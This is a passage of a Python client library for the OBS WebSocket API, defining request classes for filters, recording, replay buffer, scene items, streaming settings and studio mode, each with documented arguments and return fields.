Name of the filter to reorder
*newIndex*
type: Integer
Desired position of the filter in the chain
"""
def __init__(self, sourceName, filterName, newIndex):
Baserequests.__init__(self)
self.name = 'ReorderSourceFilter'
self.dataout['sourceName'] = sourceName
self.dataout['filterName'] = filterName
self.dataout['newIndex'] = newIndex
class MoveSourceFilter(Baserequests):
"""Move a filter in the chain (relative positioning)
:Arguments:
*sourceName*
type: String
Name of the source to which the filter belongs
*filterName*
type: String
Name of the filter to reorder
*movementType*
type: String
How to move the filter around in the source's filter chain. Either "up", "down", "top" or "bottom".
"""
def __init__(self, sourceName, filterName, movementType):
Baserequests.__init__(self)
self.name = 'MoveSourceFilter'
self.dataout['sourceName'] = sourceName
self.dataout['filterName'] = filterName
self.dataout['movementType'] = movementType
class SetSourceFilterSettings(Baserequests):
"""Update settings of a filter
:Arguments:
*sourceName*
type: String
Name of the source to which the filter belongs
*filterName*
type: String
Name of the filter to reconfigure
*filterSettings*
type: Object
New settings. These will be merged to the current filter settings.
"""
def __init__(self, sourceName, filterName, filterSettings):
Baserequests.__init__(self)
self.name = 'SetSourceFilterSettings'
self.dataout['sourceName'] = sourceName
self.dataout['filterName'] = filterName
self.dataout['filterSettings'] = filterSettings
class SetSourceFilterVisibility(Baserequests):
"""Change the visibility/enabled state of a filter
:Arguments:
*sourceName*
type: String
Source name
*filterName*
type: String
Source filter name
*filterEnabled*
type: Boolean
New filter state
"""
def __init__(self, sourceName, filterName, filterEnabled):
Baserequests.__init__(self)
self.name = 'SetSourceFilterVisibility'
self.dataout['sourceName'] = sourceName
self.dataout['filterName'] = filterName
self.dataout['filterEnabled'] = filterEnabled
class GetAudioMonitorType(Baserequests):
"""Get the audio monitoring type of the specified source.
:Arguments:
*sourceName*
type: String
Source name.
:Returns:
*monitorType*
type: String
The monitor type in use. Options: `none`, `monitorOnly`, `monitorAndOutput`.
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'GetAudioMonitorType'
self.datain['monitorType'] = None
self.dataout['sourceName'] = sourceName
def getMonitorType(self):
return self.datain['monitorType']
class SetAudioMonitorType(Baserequests):
"""Set the audio monitoring type of the specified source.
:Arguments:
*sourceName*
type: String
Source name.
*monitorType*
type: String
The monitor type to use. Options: `none`, `monitorOnly`, `monitorAndOutput`.
"""
def __init__(self, sourceName, monitorType):
Baserequests.__init__(self)
self.name = 'SetAudioMonitorType'
self.dataout['sourceName'] = sourceName
self.dataout['monitorType'] = monitorType
class TakeSourceScreenshot(Baserequests):
"""
At least `embedPictureFormat` or `saveToFilePath` must be specified.
Clients can specify `width` and `height` parameters to receive scaled pictures. Aspect ratio is
preserved if only one of these two parameters is specified.
:Arguments:
*sourceName*
type: String (optional)
Source name. Note that, since scenes are also sources, you can also provide a scene name. If not provided, the currently active scene is used.
*embedPictureFormat*
type: String (optional)
Format of the Data URI encoded picture. Can be "png", "jpg", "jpeg" or "bmp" (or any other value supported by Qt's Image module)
*saveToFilePath*
type: String (optional)
Full file path (file extension included) where the captured image is to be saved. Can be in a format different from `pictureFormat`. Can be a relative path.
*fileFormat*
type: String (optional)
Format to save the image file as (one of the values provided in the `supported-image-export-formats` response field of `GetVersion`). If not specified, tries to guess based on file extension.
*compressionQuality*
type: int (optional)
Compression ratio between -1 and 100 to write the image with. -1 is automatic, 1 is smallest file/most compression, 100 is largest file/least compression. Varies with image type.
*width*
type: int (optional)
Screenshot width. Defaults to the source's base width.
*height*
type: int (optional)
Screenshot height. Defaults to the source's base height.
:Returns:
*sourceName*
type: String
Source name
*img*
type: String
Image Data URI (if `embedPictureFormat` was specified in the request)
*imageFile*
type: String
Absolute path to the saved image file (if `saveToFilePath` was specified in the request)
"""
def __init__(self, sourceName=None, embedPictureFormat=None, saveToFilePath=None, fileFormat=None, compressionQuality=None, width=None, height=None):
Baserequests.__init__(self)
self.name = 'TakeSourceScreenshot'
self.datain['sourceName'] = None
self.datain['img'] = None
self.datain['imageFile'] = None
self.dataout['sourceName'] = sourceName
self.dataout['embedPictureFormat'] = embedPictureFormat
self.dataout['saveToFilePath'] = saveToFilePath
self.dataout['fileFormat'] = fileFormat
self.dataout['compressionQuality'] = compressionQuality
self.dataout['width'] = width
self.dataout['height'] = height
def getSourceName(self):
return self.datain['sourceName']
def getImg(self):
return self.datain['img']
def getImageFile(self):
return self.datain['imageFile']
class ListOutputs(Baserequests):
"""List existing outputs
:Returns:
*outputs*
type: Array<Output>
Outputs list
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'ListOutputs'
self.datain['outputs'] = None
def getOutputs(self):
return self.datain['outputs']
class GetOutputInfo(Baserequests):
"""Get information about a single output
:Arguments:
*outputName*
type: String
Output name
:Returns:
*outputInfo*
type: Output
Output info
"""
def __init__(self, outputName):
Baserequests.__init__(self)
self.name = 'GetOutputInfo'
self.datain['outputInfo'] = None
self.dataout['outputName'] = outputName
def getOutputInfo(self):
return self.datain['outputInfo']
class StartOutput(Baserequests):
"""
Note: Controlling outputs is an experimental feature of obs-websocket. Some plugins which add outputs to OBS may not function properly when they are controlled in this way.
:Arguments:
*outputName*
type: String
Output name
"""
def __init__(self, outputName):
Baserequests.__init__(self)
self.name = 'StartOutput'
self.dataout['outputName'] = outputName
class StopOutput(Baserequests):
"""
Note: Controlling outputs is an experimental feature of obs-websocket. Some plugins which add outputs to OBS may not function properly when they are controlled in this way.
:Arguments:
*outputName*
type: String
Output name
*force*
type: boolean (optional)
Force stop (default: false)
"""
def __init__(self, outputName, force=None):
Baserequests.__init__(self)
self.name = 'StopOutput'
self.dataout['outputName'] = outputName
self.dataout['force'] = force
class SetCurrentProfile(Baserequests):
"""Set the currently active profile.
:Arguments:
*profile_name*
type: String
Name of the desired profile.
"""
def __init__(self, profile_name):
Baserequests.__init__(self)
self.name = 'SetCurrentProfile'
self.dataout['profile-name'] = profile_name
class GetCurrentProfile(Baserequests):
"""Get the name of the current profile.
:Returns:
*profile_name*
type: String
Name of the currently active profile.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetCurrentProfile'
self.datain['profile-name'] = None
def getProfileName(self):
return self.datain['profile-name']
class ListProfiles(Baserequests):
"""Get a list of available profiles.
:Returns:
*profiles*
type: Array<Object>
List of available profiles.
*profiles.*.profile_name*
type: String
Filter name
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'ListProfiles'
self.datain['profiles'] = None
def getProfiles(self):
return self.datain['profiles']
class GetRecordingStatus(Baserequests):
"""Get current recording status.
:Returns:
*isRecording*
type: boolean
Current recording status.
*isRecordingPaused*
type: boolean
Whether the recording is paused or not.
*recordTimecode*
type: String (optional)
Time elapsed since recording started (only present if currently recording).
*recordingFilename*
type: String (optional)
Absolute path to the recording file (only present if currently recording).
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetRecordingStatus'
self.datain['isRecording'] = None
self.datain['isRecordingPaused'] = None
self.datain['recordTimecode'] = None
self.datain['recordingFilename'] = None
def getIsRecording(self):
return self.datain['isRecording']
def getIsRecordingPaused(self):
return self.datain['isRecordingPaused']
def getRecordTimecode(self):
return self.datain['recordTimecode']
def getRecordingFilename(self):
return self.datain['recordingFilename']
class StartStopRecording(Baserequests):
"""Toggle recording on or off (depending on the current recording state).
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'StartStopRecording'
class StartRecording(Baserequests):
"""Start recording.
Will return an `error` if recording is already active.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'StartRecording'
class StopRecording(Baserequests):
"""Stop recording.
Will return an `error` if recording is not active.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'StopRecording'
class PauseRecording(Baserequests):
"""Pause the current recording.
Returns an error if recording is not active or already paused.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'PauseRecording'
class ResumeRecording(Baserequests):
"""Resume/unpause the current recording (if paused).
Returns an error if recording is not active or not paused.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'ResumeRecording'
class SetRecordingFolder(Baserequests):
"""
Please note: if `SetRecordingFolder` is called while a recording is
in progress, the change won't be applied immediately and will be
effective on the next recording.
:Arguments:
*rec_folder*
type: String
Path of the recording folder.
"""
def __init__(self, rec_folder):
Baserequests.__init__(self)
self.name = 'SetRecordingFolder'
self.dataout['rec-folder'] = rec_folder
class GetRecordingFolder(Baserequests):
"""Get the path of the current recording folder.
:Returns:
*rec_folder*
type: String
Path of the recording folder.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetRecordingFolder'
self.datain['rec-folder'] = None
def getRecFolder(self):
return self.datain['rec-folder']
class GetReplayBufferStatus(Baserequests):
"""Get the status of the OBS replay buffer.
:Returns:
*isReplayBufferActive*
type: boolean
Current recording status.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetReplayBufferStatus'
self.datain['isReplayBufferActive'] = None
def getIsReplayBufferActive(self):
return self.datain['isReplayBufferActive']
class StartStopReplayBuffer(Baserequests):
"""Toggle the Replay Buffer on/off (depending on the current state of the replay buffer).
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'StartStopReplayBuffer'
class StartReplayBuffer(Baserequests):
"""Start recording into the Replay Buffer.
Will return an `error` if the Replay Buffer is already active or if the
"Save Replay Buffer" hotkey is not set in OBS' settings.
Setting this hotkey is mandatory, even when triggering saves only
through obs-websocket.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'StartReplayBuffer'
class StopReplayBuffer(Baserequests):
"""Stop recording into the Replay Buffer.
Will return an `error` if the Replay Buffer is not active.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'StopReplayBuffer'
class SaveReplayBuffer(Baserequests):
"""Flush and save the contents of the Replay Buffer to disk. This is
basically the same as triggering the "Save Replay Buffer" hotkey.
Will return an `error` if the Replay Buffer is not active.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'SaveReplayBuffer'
class SetCurrentSceneCollection(Baserequests):
"""Change the active scene collection.
:Arguments:
*sc_name*
type: String
Name of the desired scene collection.
"""
def __init__(self, sc_name):
Baserequests.__init__(self)
self.name = 'SetCurrentSceneCollection'
self.dataout['sc-name'] = sc_name
class GetCurrentSceneCollection(Baserequests):
"""Get the name of the current scene collection.
:Returns:
*sc_name*
type: String
Name of the currently active scene collection.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetCurrentSceneCollection'
self.datain['sc-name'] = None
def getScName(self):
return self.datain['sc-name']
class ListSceneCollections(Baserequests):
"""List available scene collections
:Returns:
*scene_collections*
type: Array<String>
Scene collections list
*scene_collections.*.sc_name*
type: String
Scene collection name
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'ListSceneCollections'
self.datain['scene-collections'] = None
def getSceneCollections(self):
return self.datain['scene-collections']
class GetSceneItemList(Baserequests):
"""Get a list of all scene items in a scene.
:Arguments:
*sceneName*
type: String (optional)
Name of the scene to get the list of scene items from. Defaults to the current scene if not specified.
:Returns:
*sceneName*
type: String
Name of the requested (or current) scene
*sceneItems*
type: Array<Object>
Array of scene items
*sceneItems.*.itemId*
type: int
Unique item id of the source item
*sceneItems.*.sourceKind*
type: String
ID if the scene item's source. For example `vlc_source` or `image_source`
*sceneItems.*.sourceName*
type: String
Name of the scene item's source
*sceneItems.*.sourceType*
type: String
Type of the scene item's source. Either `input`, `group`, or `scene`
"""
def __init__(self, sceneName=None):
Baserequests.__init__(self)
self.name = 'GetSceneItemList'
self.datain['sceneName'] = None
self.datain['sceneItems'] = None
self.dataout['sceneName'] = sceneName
def getSceneName(self):
return self.datain['sceneName']
def getSceneItems(self):
return self.datain['sceneItems']
class GetSceneItemProperties(Baserequests):
"""Gets the scene specific properties of the specified source item.
Coordinates are relative to the item's parent (the scene or group it belongs to).
:Arguments:
*scene_name*
type: String (optional)
Name of the scene the scene item belongs to. Defaults to the current scene.
*item*
type: String | Object
Scene Item name (if this field is a string) or specification (if it is an object).
*item.name*
type: String (optional)
Scene Item name (if the `item` field is an object)
*item.id*
type: int (optional)
Scene Item ID (if the `item` field is an object)
:Returns:
*name*
type: String
Scene Item name.
*itemId*
type: int
Scene Item ID.
*position.x*
type: double
The x position of the source from the left.
*position.y*
type: double
The y position of the source from the top.
*position.alignment*
type: int
The point on the source that the item is manipulated from. The sum of 1=Left or 2=Right, and 4=Top or 8=Bottom, or omit to center on that axis.
*rotation*
type: double
The clockwise rotation of the item in degrees around the point of alignment.
*scale.x*
type: double
The x-scale factor of the source.
*scale.y*
type: double
The y-scale factor of the source.
*crop.top*
type: int
The number of pixels cropped off the top of the source before scaling.
*crop.right*
type: int
The number of pixels cropped off the right of the source before scaling.
*crop.bottom*
type: int
The number of pixels cropped off the bottom of the source before scaling.
*crop.left*
type: int
The number of pixels cropped off the left of the source before scaling.
*visible*
type: bool
If the source is visible.
*muted*
type: bool
If the source is muted.
*locked*
type: bool
If the source's transform is locked.
*bounds.type*
type: String
Type of bounding box. Can be "OBS_BOUNDS_STRETCH", "OBS_BOUNDS_SCALE_INNER", "OBS_BOUNDS_SCALE_OUTER", "OBS_BOUNDS_SCALE_TO_WIDTH", "OBS_BOUNDS_SCALE_TO_HEIGHT", "OBS_BOUNDS_MAX_ONLY" or "OBS_BOUNDS_NONE".
*bounds.alignment*
type: int
Alignment of the bounding box.
*bounds.x*
type: double
Width of the bounding box.
*bounds.y*
type: double
Height of the bounding box.
*sourceWidth*
type: int
Base width (without scaling) of the source
*sourceHeight*
type: int
Base source (without scaling) of the source
*width*
type: double
Scene item width (base source width multiplied by the horizontal scaling factor)
*height*
type: double
Scene item height (base source height multiplied by the vertical scaling factor)
*parentGroupName*
type: String (optional)
Name of the item's parent (if this item belongs to a group)
*groupChildren*
type: Array<SceneItemTransform> (optional)
List of children (if this item is a group)
"""
def __init__(self, item, scene_name=None):
Baserequests.__init__(self)
self.name = 'GetSceneItemProperties'
self.datain['name'] = None
self.datain['itemId'] = None
self.datain['position'] = None
self.datain['rotation'] = None
self.datain['scale'] = None
self.datain['crop'] = None
self.datain['visible'] = None
self.datain['muted'] = None
self.datain['locked'] = None
self.datain['bounds'] = None
self.datain['sourceWidth'] = None
self.datain['sourceHeight'] = None
self.datain['width'] = None
self.datain['height'] = None
self.datain['parentGroupName'] = None
self.datain['groupChildren'] = None
self.dataout['item'] = item
self.dataout['scene-name'] = scene_name
def getName(self):
return self.datain['name']
def getItemId(self):
return self.datain['itemId']
def getPosition(self):
return self.datain['position']
def getRotation(self):
return self.datain['rotation']
def getScale(self):
return self.datain['scale']
def getCrop(self):
return self.datain['crop']
def getVisible(self):
return self.datain['visible']
def getMuted(self):
return self.datain['muted']
def getLocked(self):
return self.datain['locked']
def getBounds(self):
return self.datain['bounds']
def getSourceWidth(self):
return self.datain['sourceWidth']
def getSourceHeight(self):
return self.datain['sourceHeight']
def getWidth(self):
return self.datain['width']
def getHeight(self):
return self.datain['height']
def getParentGroupName(self):
return self.datain['parentGroupName']
def getGroupChildren(self):
return self.datain['groupChildren']
class SetSceneItemProperties(Baserequests):
"""Sets the scene specific properties of a source. Unspecified properties will remain unchanged.
Coordinates are relative to the item's parent (the scene or group it belongs to).
:Arguments:
*scene_name*
type: String (optional)
Name of the scene the source item belongs to. Defaults to the current scene.
*item*
type: String | Object
Scene Item name (if this field is a string) or specification (if it is an object).
*item.name*
type: String (optional)
Scene Item name (if the `item` field is an object)
*item.id*
type: int (optional)
Scene Item ID (if the `item` field is an object)
*position.x*
type: double (optional)
The new x position of the source.
*position.y*
type: double (optional)
The new y position of the source.
*position.alignment*
type: int (optional)
The new alignment of the source.
*rotation*
type: double (optional)
The new clockwise rotation of the item in degrees.
*scale.x*
type: double (optional)
The new x scale of the item.
*scale.y*
type: double (optional)
The new y scale of the item.
*crop.top*
type: int (optional)
The new amount of pixels cropped off the top of the source before scaling.
*crop.bottom*
type: int (optional)
The new amount of pixels cropped off the bottom of the source before scaling.
*crop.left*
type: int (optional)
The new amount of pixels cropped off the left of the source before scaling.
*crop.right*
type: int (optional)
The new amount of pixels cropped off the right of the source before scaling.
*visible*
type: bool (optional)
The new visibility of the source. 'true' shows source, 'false' hides source.
*locked*
type: bool (optional)
The new locked status of the source. 'true' keeps it in its current position, 'false' allows movement.
*bounds.type*
type: String (optional)
The new bounds type of the source. Can be "OBS_BOUNDS_STRETCH", "OBS_BOUNDS_SCALE_INNER", "OBS_BOUNDS_SCALE_OUTER", "OBS_BOUNDS_SCALE_TO_WIDTH", "OBS_BOUNDS_SCALE_TO_HEIGHT", "OBS_BOUNDS_MAX_ONLY" or "OBS_BOUNDS_NONE".
*bounds.alignment*
type: int (optional)
The new alignment of the bounding box. (0-2, 4-6, 8-10)
*bounds.x*
type: double (optional)
The new width of the bounding box.
*bounds.y*
type: double (optional)
The new height of the bounding box.
"""
def __init__(self, item, scene_name=None, position=None, rotation=None, scale=None, crop=None, visible=None, locked=None, bounds=None):
Baserequests.__init__(self)
self.name = 'SetSceneItemProperties'
self.dataout['item'] = item
self.dataout['scene-name'] = scene_name
self.dataout['position'] = position
self.dataout['rotation'] = rotation
self.dataout['scale'] = scale
self.dataout['crop'] = crop
self.dataout['visible'] = visible
self.dataout['locked'] = locked
self.dataout['bounds'] = bounds
class ResetSceneItem(Baserequests):
"""Reset a scene item.
:Arguments:
*scene_name*
type: String (optional)
Name of the scene the scene item belongs to. Defaults to the current scene.
*item*
type: String | Object
Scene Item name (if this field is a string) or specification (if it is an object).
*item.name*
type: String (optional)
Scene Item name (if the `item` field is an object)
*item.id*
type: int (optional)
Scene Item ID (if the `item` field is an object)
"""
def __init__(self, item, scene_name=None):
Baserequests.__init__(self)
self.name = 'ResetSceneItem'
self.dataout['item'] = item
self.dataout['scene-name'] = scene_name
class SetSceneItemRender(Baserequests):
"""Show or hide a specified source item in a specified scene.
:Arguments:
*scene_name*
type: String (optional)
Name of the scene the scene item belongs to. Defaults to the currently active scene.
*source*
type: String
Scene Item name.
*render*
type: boolean
true = shown ; false = hidden
"""
def __init__(self, source, render, scene_name=None):
Baserequests.__init__(self)
self.name = 'SetSceneItemRender'
self.dataout['source'] = source
self.dataout['render'] = render
self.dataout['scene-name'] = scene_name
class SetSceneItemPosition(Baserequests):
"""Sets the coordinates of a specified source item.
:Arguments:
*scene_name*
type: String (optional)
Name of the scene the scene item belongs to. Defaults to the current scene.
*item*
type: String
Scene Item name.
*x*
type: double
X coordinate.
*y*
type: double
Y coordinate.
"""
def __init__(self, item, x, y, scene_name=None):
Baserequests.__init__(self)
self.name = 'SetSceneItemPosition'
self.dataout['item'] = item
self.dataout['x'] = x
self.dataout['y'] = y
self.dataout['scene-name'] = scene_name
class SetSceneItemTransform(Baserequests):
"""Set the transform of the specified source item.
:Arguments:
*scene_name*
type: String (optional)
Name of the scene the scene item belongs to. Defaults to the current scene.
*item*
type: String
Scene Item name.
*x_scale*
type: double
Width scale factor.
*y_scale*
type: double
Height scale factor.
*rotation*
type: double
Source item rotation (in degrees).
"""
def __init__(self, item, x_scale, y_scale, rotation, scene_name=None):
Baserequests.__init__(self)
self.name = 'SetSceneItemTransform'
self.dataout['item'] = item
self.dataout['x-scale'] = x_scale
self.dataout['y-scale'] = y_scale
self.dataout['rotation'] = rotation
self.dataout['scene-name'] = scene_name
class SetSceneItemCrop(Baserequests):
"""Sets the crop coordinates of the specified source item.
:Arguments:
*scene_name*
type: String (optional)
Name of the scene the scene item belongs to. Defaults to the current scene.
*item*
type: String
Scene Item name.
*top*
type: int
Pixel position of the top of the source item.
*bottom*
type: int
Pixel position of the bottom of the source item.
*left*
type: int
Pixel position of the left of the source item.
*right*
type: int
Pixel position of the right of the source item.
"""
def __init__(self, item, top, bottom, left, right, scene_name=None):
Baserequests.__init__(self)
self.name = 'SetSceneItemCrop'
self.dataout['item'] = item
self.dataout['top'] = top
self.dataout['bottom'] = bottom
self.dataout['left'] = left
self.dataout['right'] = right
self.dataout['scene-name'] = scene_name
class DeleteSceneItem(Baserequests):
"""Deletes a scene item.
:Arguments:
*scene*
type: String (optional)
Name of the scene the scene item belongs to. Defaults to the current scene.
*item*
type: Object
Scene item to delete (required)
*item.name*
type: String
Scene Item name (prefer `id`, including both is acceptable).
*item.id*
type: int
Scene Item ID.
"""
def __init__(self, item, scene=None):
Baserequests.__init__(self)
self.name = 'DeleteSceneItem'
self.dataout['item'] = item
self.dataout['scene'] = scene
class AddSceneItem(Baserequests):
"""Creates a scene item in a scene. In other words, this is how you add a source into a scene.
:Arguments:
*sceneName*
type: String
Name of the scene to create the scene item in
*sourceName*
type: String
Name of the source to be added
*setVisible*
type: boolean
Whether to make the sceneitem visible on creation or not. Default `true`
:Returns:
*itemId*
type: int
Numerical ID of the created scene item
"""
def __init__(self, sceneName, sourceName, setVisible):
Baserequests.__init__(self)
self.name = 'AddSceneItem'
self.datain['itemId'] = None
self.dataout['sceneName'] = sceneName
self.dataout['sourceName'] = sourceName
self.dataout['setVisible'] = setVisible
def getItemId(self):
return self.datain['itemId']
class DuplicateSceneItem(Baserequests):
"""Duplicates a scene item.
:Arguments:
*fromScene*
type: String (optional)
Name of the scene to copy the item from. Defaults to the current scene.
*toScene*
type: String (optional)
Name of the scene to create the item in. Defaults to the current scene.
*item*
type: Object
Scene Item to duplicate from the source scene (required)
*item.name*
type: String
Scene Item name (prefer `id`, including both is acceptable).
*item.id*
type: int
Scene Item ID.
:Returns:
*scene*
type: String
Name of the scene where the new item was created
*item*
type: Object
New item info
*item.id*
type: int
New item ID
*item.name*
type: String
New item name
"""
def __init__(self, item, fromScene=None, toScene=None):
Baserequests.__init__(self)
self.name = 'DuplicateSceneItem'
self.datain['scene'] = None
self.datain['item'] = None
self.dataout['item'] = item
self.dataout['fromScene'] = fromScene
self.dataout['toScene'] = toScene
def getScene(self):
return self.datain['scene']
def getItem(self):
return self.datain['item']
class SetCurrentScene(Baserequests):
"""Switch to the specified scene.
:Arguments:
*scene_name*
type: String
Name of the scene to switch to.
"""
def __init__(self, scene_name):
Baserequests.__init__(self)
self.name = 'SetCurrentScene'
self.dataout['scene-name'] = scene_name
class GetCurrentScene(Baserequests):
"""Get the current scene's name and source items.
:Returns:
*name*
type: String
Name of the currently active scene.
*sources*
type: Array<SceneItem>
Ordered list of the current scene's source items.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetCurrentScene'
self.datain['name'] = None
self.datain['sources'] = None
def getName(self):
return self.datain['name']
def getSources(self):
return self.datain['sources']
class GetSceneList(Baserequests):
"""Get a list of scenes in the currently active profile.
:Returns:
*current_scene*
type: String
Name of the currently active scene.
*scenes*
type: Array<Scene>
Ordered list of the current profile's scenes (See [GetCurrentScene](#getcurrentscene) for more information).
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetSceneList'
self.datain['current-scene'] = None
self.datain['scenes'] = None
def getCurrentScene(self):
return self.datain['current-scene']
def getScenes(self):
return self.datain['scenes']
class CreateScene(Baserequests):
"""Create a new scene scene.
:Arguments:
*sceneName*
type: String
Name of the scene to create.
"""
def __init__(self, sceneName):
Baserequests.__init__(self)
self.name = 'CreateScene'
self.dataout['sceneName'] = sceneName
class ReorderSceneItems(Baserequests):
"""Changes the order of scene items in the requested scene.
:Arguments:
*scene*
type: String (optional)
Name of the scene to reorder (defaults to current).
*items*
type: Array<Scene>
Ordered list of objects with name and/or id specified. Id preferred due to uniqueness per scene
*items.*.id*
type: int (optional)
Id of a specific scene item. Unique on a scene by scene basis.
*items.*.name*
type: String (optional)
Name of a scene item. Sufficiently unique if no scene items share sources within the scene.
"""
def __init__(self, items, scene=None):
Baserequests.__init__(self)
self.name = 'ReorderSceneItems'
self.dataout['items'] = items
self.dataout['scene'] = scene
class SetSceneTransitionOverride(Baserequests):
"""Set a scene to use a specific transition override.
:Arguments:
*sceneName*
type: String
Name of the scene to switch to.
*transitionName*
type: String
Name of the transition to use.
*transitionDuration*
type: int (Optional)
Duration in milliseconds of the transition if transition is not fixed. Defaults to the current duration specified in the UI if there is no current override and this value is not given.
"""
def __init__(self, sceneName, transitionName, transitionDuration):
Baserequests.__init__(self)
self.name = 'SetSceneTransitionOverride'
self.dataout['sceneName'] = sceneName
self.dataout['transitionName'] = transitionName
self.dataout['transitionDuration'] = transitionDuration
class RemoveSceneTransitionOverride(Baserequests):
"""Remove any transition override on a scene.
:Arguments:
*sceneName*
type: String
Name of the scene to switch to.
"""
def __init__(self, sceneName):
Baserequests.__init__(self)
self.name = 'RemoveSceneTransitionOverride'
self.dataout['sceneName'] = sceneName
class GetSceneTransitionOverride(Baserequests):
"""Get the current scene transition override.
:Arguments:
*sceneName*
type: String
Name of the scene to switch to.
:Returns:
*transitionName*
type: String
Name of the current overriding transition. Empty string if no override is set.
*transitionDuration*
type: int
Transition duration. `-1` if no override is set.
"""
def __init__(self, sceneName):
Baserequests.__init__(self)
self.name = 'GetSceneTransitionOverride'
self.datain['transitionName'] = None
self.datain['transitionDuration'] = None
self.dataout['sceneName'] = sceneName
def getTransitionName(self):
return self.datain['transitionName']
def getTransitionDuration(self):
return self.datain['transitionDuration']
class GetStreamingStatus(Baserequests):
"""Get current streaming and recording status.
:Returns:
*streaming*
type: boolean
Current streaming status.
*recording*
type: boolean
Current recording status.
*stream_timecode*
type: String (optional)
Time elapsed since streaming started (only present if currently streaming).
*rec_timecode*
type: String (optional)
Time elapsed since recording started (only present if currently recording).
*preview_only*
type: boolean
Always false. Retrocompatibility with OBSRemote.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetStreamingStatus'
self.datain['streaming'] = None
self.datain['recording'] = None
self.datain['stream-timecode'] = None
self.datain['rec-timecode'] = None
self.datain['preview-only'] = None
def getStreaming(self):
return self.datain['streaming']
def getRecording(self):
return self.datain['recording']
def getStreamTimecode(self):
return self.datain['stream-timecode']
def getRecTimecode(self):
return self.datain['rec-timecode']
def getPreviewOnly(self):
return self.datain['preview-only']
class StartStopStreaming(Baserequests):
"""Toggle streaming on or off (depending on the current stream state).
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'StartStopStreaming'
class StartStreaming(Baserequests):
"""Start streaming.
Will return an `error` if streaming is already active.
:Arguments:
*stream*
type: Object (optional)
Special stream configuration. Please note: these won't be saved to OBS' configuration.
*stream.type*
type: String (optional)
If specified ensures the type of stream matches the given type (usually 'rtmp_custom' or 'rtmp_common'). If the currently configured stream type does not match the given stream type, all settings must be specified in the `settings` object or an error will occur when starting the stream.
*stream.metadata*
type: Object (optional)
Adds the given object parameters as encoded query string parameters to the 'key' of the RTMP stream. Used to pass data to the RTMP service about the streaming. May be any String, Numeric, or Boolean field.
*stream.settings*
type: Object (optional)
Settings for the stream.
*stream.settings.server*
type: String (optional)
The publish URL.
*stream.settings.key*
type: String (optional)
The publish key of the stream.
*stream.settings.use_auth*
type: boolean (optional)
Indicates whether authentication should be used when connecting to the streaming server.
*stream.settings.username*
type: String (optional)
If authentication is enabled, the username for the streaming server. Ignored if `use_auth` is not set to `true`.
*stream.settings.password*
type: String (optional)
If authentication is enabled, the password for the streaming server. Ignored if `use_auth` is not set to `true`.
"""
def __init__(self, stream=None):
Baserequests.__init__(self)
self.name = 'StartStreaming'
self.dataout['stream'] = stream
class StopStreaming(Baserequests):
"""Stop streaming.
Will return an `error` if streaming is not active.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'StopStreaming'
class SetStreamSettings(Baserequests):
"""Sets one or more attributes of the current streaming server settings. Any options not passed will remain unchanged. Returns the updated settings in response. If 'type' is different than the current streaming service type, all settings are required. Returns the full settings of the stream (the same as GetStreamSettings).
:Arguments:
*type*
type: String
The type of streaming service configuration, usually `rtmp_custom` or `rtmp_common`.
*settings*
type: Object
The actual settings of the stream.
*settings.server*
type: String (optional)
The publish URL.
*settings.key*
type: String (optional)
The publish key.
*settings.use_auth*
type: boolean (optional)
Indicates whether authentication should be used when connecting to the streaming server.
*settings.username*
type: String (optional)
The username for the streaming service.
*settings.password*
type: String (optional)
The password for the streaming service.
*save*
type: boolean
Persist the settings to disk.
"""
def __init__(self, type, settings, save):
Baserequests.__init__(self)
self.name = 'SetStreamSettings'
self.dataout['type'] = type
self.dataout['settings'] = settings
self.dataout['save'] = save
class GetStreamSettings(Baserequests):
"""Get the current streaming server settings.
:Returns:
*type*
type: String
The type of streaming service configuration. Possible values: 'rtmp_custom' or 'rtmp_common'.
*settings*
type: Object
Stream settings object.
*settings.server*
type: String
The publish URL.
*settings.key*
type: String
The publish key of the stream.
*settings.use_auth*
type: boolean
Indicates whether authentication should be used when connecting to the streaming server.
*settings.username*
type: String
The username to use when accessing the streaming server. Only present if `use_auth` is `true`.
*settings.password*
type: String
The password to use when accessing the streaming server. Only present if `use_auth` is `true`.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetStreamSettings'
self.datain['type'] = None
self.datain['settings'] = None
def getType(self):
return self.datain['type']
def getSettings(self):
return self.datain['settings']
class SaveStreamSettings(Baserequests):
"""Save the current streaming server settings to disk.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'SaveStreamSettings'
class SendCaptions(Baserequests):
"""Send the provided text as embedded CEA-608 caption data.
:Arguments:
*text*
type: String
Captions text
"""
def __init__(self, text):
Baserequests.__init__(self)
self.name = 'SendCaptions'
self.dataout['text'] = text
class GetStudioModeStatus(Baserequests):
"""Indicates if Studio Mode is currently enabled.
:Returns:
*studio_mode*
type: boolean
Indicates if Studio Mode is enabled.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetStudioModeStatus'
self.datain['studio-mode'] = None
def getStudioMode(self):
return self.datain['studio-mode']
class GetPreviewScene(Baserequests):
"""Get the name of the currently previewed scene and its list of sources.
Will return an `error` if Studio Mode is not enabled.
:Returns:
*name*
type: String
The name of the active preview scene.
*sources*
type: Array<SceneItem>
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetPreviewScene'
self.datain['name'] = None
